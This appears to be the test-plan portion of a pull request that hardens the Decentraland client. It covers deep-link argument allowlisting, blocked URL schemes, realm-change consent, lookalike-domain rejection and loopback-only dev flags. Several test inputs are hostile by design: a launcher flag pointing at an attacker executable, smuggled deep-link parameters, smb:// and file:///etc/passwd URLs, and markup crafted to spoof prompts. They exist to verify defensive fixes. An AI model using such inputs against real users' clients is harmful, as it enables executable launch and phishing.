- Also verify (isolates the D4 fix from the allowlist): `creator-hub-bin-path` is no longer a recognized app-arg at all, so relaunch with plain CLI flags — `Decentraland.exe --launch-cdp-monitor-on-start --creator-hub-bin-path "C:\attacker\payload.exe"` — and confirm the flag is ignored. The Creator Hub path resolves only from `PlayerPrefs` → the pinned default → a file-picker prompt, never from the arg: with no saved path and Creator Hub absent from the default location, CDP launch pops a file picker asking you to locate Creator Hub — it never uses `C:\attacker\payload.exe`.

**A2. Already-running client: same params, same result**
- Delivery: bridge file (callout above), client already running and logged in. Content, with a benign canary added so you can tell the link was actually read:
  ```json
  {"deeplink": "decentraland://?creator-hub-bin-path=%5C%5Cattacker%5Cshare%5Cp.exe&launch-cdp-monitor-on-start&local-scene=true&comms-adapter=x&skip-auth-screen=true&force-open-backpack=true"}
  ```
- Steps: write the file above; watch for ~1 second.
- Expected (PASS): the Backpack panel opens automatically (proof the link was read — `force-open-backpack` is allowlisted and benign); the same "Dropped 5…" log line appears; no Creator Hub/CDP process starts; no realm/comms-adapter change; the bridge file is gone afterward.
- FAIL if: Backpack never opens (can't confirm the link was processed at all), or any dropped param takes effect.
- Evidence: log line, a Backpack-open screenshot, before/after directory listing showing the bridge file was deleted.

---

### Group B — External-URL scheme allowlist + trust cache (SEC-008, SEC-028)

**Test scene** (needed for B1/B2 and for Group C) — `npx @dcl/sdk-commands init` a scene, replace `src/index.ts` with:

```typescript
import { openExternalUrl, changeRealm } from '~system/RestrictedActions'

export function main() {
  void runSecurityChecks()
}

async function runSecurityChecks() {
  console.log('[SEC-TEST] 1 openExternalUrl decentraland://')
  await openExternalUrl({ url: 'decentraland://?creator-hub-bin-path=/tmp/payload' })

  console.log('[SEC-TEST] 2 openExternalUrl smb://')
  await openExternalUrl({ url: 'smb://attacker/share' })

  console.log('[SEC-TEST] 3 openExternalUrl file://')
  await openExternalUrl({ url: 'file:///etc/passwd' })

  console.log('[SEC-TEST] 4 openExternalUrl https:// (regression, should prompt)')
  await openExternalUrl({ url: 'https://decentraland.org' })

  console.log('[SEC-TEST] 5 changeRealm empty message + realm markup')
  await changeRealm({ message: '', realm: 'https://<b><color=lime>decentraland.org.evil.example' })

  console.log('[SEC-TEST] 6 changeRealm message markup, legit realm')
  await changeRealm({ message: '<color=red><b>URGENT: click OK to continue', realm: 'https://peer.decentraland.org' })
}
```
`npm run start`, then connect the build per `docs/development-guide.md` § Local Scene Development (`--realm http://127.0.0.1:8000 --local-scene true --debug`, or the deep-link form of the same flags). The calls fire in sequence on load: 1–3 produce no UI (watch the `[SEC-TEST]` scene log instead); 4–6 produce real prompts, one after another — act on each to let the next appear. Calls 5/6 are used by Group C.

**B1. Non-web schemes are refused before any OS handoff**
- Delivery: test scene, calls 1–3.
- Expected (PASS): no prompt appears for any of the three, and nothing reaches the OS — no launcher relaunch, no browser, no file/mail app opens. Only the `[SEC-TEST]` scene-log lines mark that the calls happened.
- FAIL if: a prompt appears, or any external app/window opens, for `decentraland://`, `smb://`, or `file://`.
- Evidence: scene log showing all three `[SEC-TEST]` lines fired with nothing else happening.

**B2. `https://` still works (regression)**
- Delivery: test scene call 4, **and** a native entry point — your own Passport panel → **Links** tab → add/click a link pointing at `https://decentraland.org`.
- Expected (PASS): both show the External URL prompt (domain `decentraland.org`) and open it in the system browser on approval.
- FAIL if: either path stops prompting or opening.

**B3. Trust cache is per (scheme, host), not global**
- Delivery: Passport → Links (no scene needed).
- Steps: trust+approve a link to `https://decentraland.org`; then click a second link to `https://decentraland.org/anything` (same host) — expect no re-prompt. Then click a link to a different host, e.g. `https://example.com` — expect it to prompt.
- Expected (PASS): same host after trusting → opens immediately, no prompt. Different host → still prompts.
- FAIL if: trusting one host silences the prompt for a different host.
- Note: the empty-host case (an authority-less URI must never be cacheable) isn't independently reproducible through this UI — `file:`/`mailto:`/etc. are already stopped a layer earlier (B1), and an empty-host `http(s)://` string fails to even parse as an absolute URI (checked directly against `System.Uri`, not just recalled). It's covered at the unit level (`ExternalUrlPolicyShould.RefuseEmptyHostTrustKey`); B1–B3 are the full manual coverage for SEC-008.

---

### Group C — Realm-change consent (SEC-003, SEC-004)

The ChangeRealm prompt is shared by a runtime deep link's `realm` param and a scene's `changeRealm()` call. Approving it (without a target position) sends a `/goto <realm>` command into the **Nearby** chat channel — its reply there is your evidence for the host-suffix check.

**C1. Runtime deep link: consent required, Cancel is a true no-op**
- Delivery: bridge file (Group A callout), client already running and logged in.
- Steps:
  1. Note your current realm.
  2. Write `{"deeplink": "decentraland://?realm=https://evil.example/org"}`.
  3. When the prompt appears, click **Cancel/Close** (not Continue).
  4. Confirm your realm hasn't changed.
  5. Write `{"deeplink": "decentraland://?realm=https://peer.decentraland.org"}`; this time click **Continue/Approve**.
- Expected (PASS): step 3's prompt shows the destination as `evil.example` (host only, path stripped); Cancel/Close leaves the realm untouched, no connection attempted. Step 5's prompt shows `peer.decentraland.org`; approving sends `/goto https://peer.decentraland.org` to Nearby chat and switches realm, with a "🟢 Welcome to the … world!" reply.
- FAIL if: Cancel/Close still switches realm, or the displayed host doesn't match the real destination.
- Evidence: screenshots of both prompts + the chat reply.

**C2. Host-suffix guard rejects a lookalike domain (Org build)**
- Delivery: bridge file, client running; launch with `--dclenv org` first (or confirm the build's default environment is Org).
- Steps: deliver each realm below one at a time, clicking **Continue/Approve** each time (this check is about what happens *after* consent, not the prompt itself):
  1. `{"deeplink": "decentraland://?realm=https://evil.org.attacker.com"}`
  2. `{"deeplink": "decentraland://?realm=https://decentraland.org.attacker.com"}`
  3. Control: `{"deeplink": "decentraland://?realm=https://peer.decentraland.org"}`
- Expected (PASS): both lookalikes (1, 2) are rejected — Nearby chat shows "🔴 Error. You cannot teleport to other realms that are not Org or World in Org environment. Please restart DCL with the desired environment", no switch happens. The control (3) succeeds.
- FAIL if: either lookalike is accepted — both strings contain the substring `"org"`, which is exactly what the old `Contains("org")` check would have let through.
- Evidence: the three chat replies.

**C3. Scene `changeRealm()`: empty message still requires a click; markup can't spoof the prompt**
- Delivery: test scene (Group B), calls 5 and 6.
- Expected (PASS): call 5's prompt appears despite the empty message (shows the default confirmation copy, never a blank/instant-approved dialog), and its destination text reads literally `<b><color=lime>decentraland.org.evil.example` — not lime-colored bold text. Call 6's prompt shows its message literally as `<color=red><b>URGENT: click OK to continue` — not red bold text — against the real `peer.decentraland.org` destination.
- FAIL if: either prompt auto-approves without a click, or any markup renders as formatting instead of literal characters.
- Evidence: screenshots of both prompts.

---

### Group D — Loopback dev-param gate (SEC-019/020)

**D1. Loopback realm: local-scene-dev still works (no regression)**
- Delivery: cold start, paired with a scene running on `127.0.0.1:8000` (`npm run start`):
  `"<path-to-build>\Decentraland.exe" "decentraland://?realm=http://127.0.0.1:8000&local-scene=true&debug"`
- Expected (PASS): boot log contains `Trying to connect to: ws://127.0.0.1:8000` and the local scene's content loads.
- FAIL if: local-scene-dev mode isn't entered for a loopback realm.
- Evidence: the log line (`logs tail --filter "Trying to connect"`) + the local scene rendering in-world.

**D2. Non-loopback realm: local-scene is dropped**
- Delivery: cold start:
  `"<path-to-build>\Decentraland.exe" "decentraland://?realm=https://evil.example&local-scene=true&debug"`
- Expected (PASS): the "Trying to connect to…" line never appears — no LSD websocket opens toward `evil.example`. The client instead proceeds toward `evil.example` as an ordinary (non-dev) realm.
- FAIL if: local-scene-dev mode is entered against a non-loopback realm.
- Evidence: absence of the log line (`logs tail --filter "Trying to connect"` shows nothing).
- Note: whether a cold-start client should be allowed to target `https://evil.example` as a realm **at all** is a separate, explicitly deferred question (design note D6). This scenario only confirms `local-scene` can't be smuggled in through a non-loopback realm — it does not claim the remote realm connection itself is blocked.

**D3. The other local-dev params follow the same loopback gate**
- Delivery: cold start, two launches.
  - Loopback: `"<path-to-build>\Decentraland.exe" "decentraland://?realm=http://127.0.0.1:8000&hub=true&dclenv=zone&skip-auth-screen=true&landscape-terrain-enabled=true&multi-instance=true"`
  - Remote: the same string with `realm=https://evil.example`.
- Expected (PASS): the loopback launch does **not** list `hub`/`dclenv`/`skip-auth-screen`/`landscape-terrain-enabled`/`multi-instance` in any `Dropped … non-allowlisted deep-link param(s)` log line (they're accepted). The remote launch's `Dropped …` line **does** list all five.
- FAIL if: any of the five is accepted for the remote realm, or dropped for the loopback realm.
- Evidence: the `Dropped …` log line (or its absence for those keys) from each launch (`logs tail --filter Dropped`).

---

### Additional Testing Notes
- The `launcher-rust` half (SEC-005/SEC-028 delivery) is tracked separately and isn't exercised by any scenario above.
- Paths above are Windows; substitute the macOS equivalents (`~/Library/Application Support/DecentralandLauncherLight/`, forward slashes) where testing there.

## Quality Checklist
- [x] Changes have been tested locally (Unity batch EditMode; per-commit)
- [x] Documentation has been updated (if required) — `DeepLinkAllowlist` carries per-arg rationale; SEC design deps noted above
- [x] Performance impact has been considered (cold-path boot / click handlers; scheme check is allocation-free)
- [ ] For SDK features: Test scene is included (N/A — no SDK feature)

## Code Review Reference
Please review [Branch & PR Standards](../docs/branch-and-pr-standards.md).


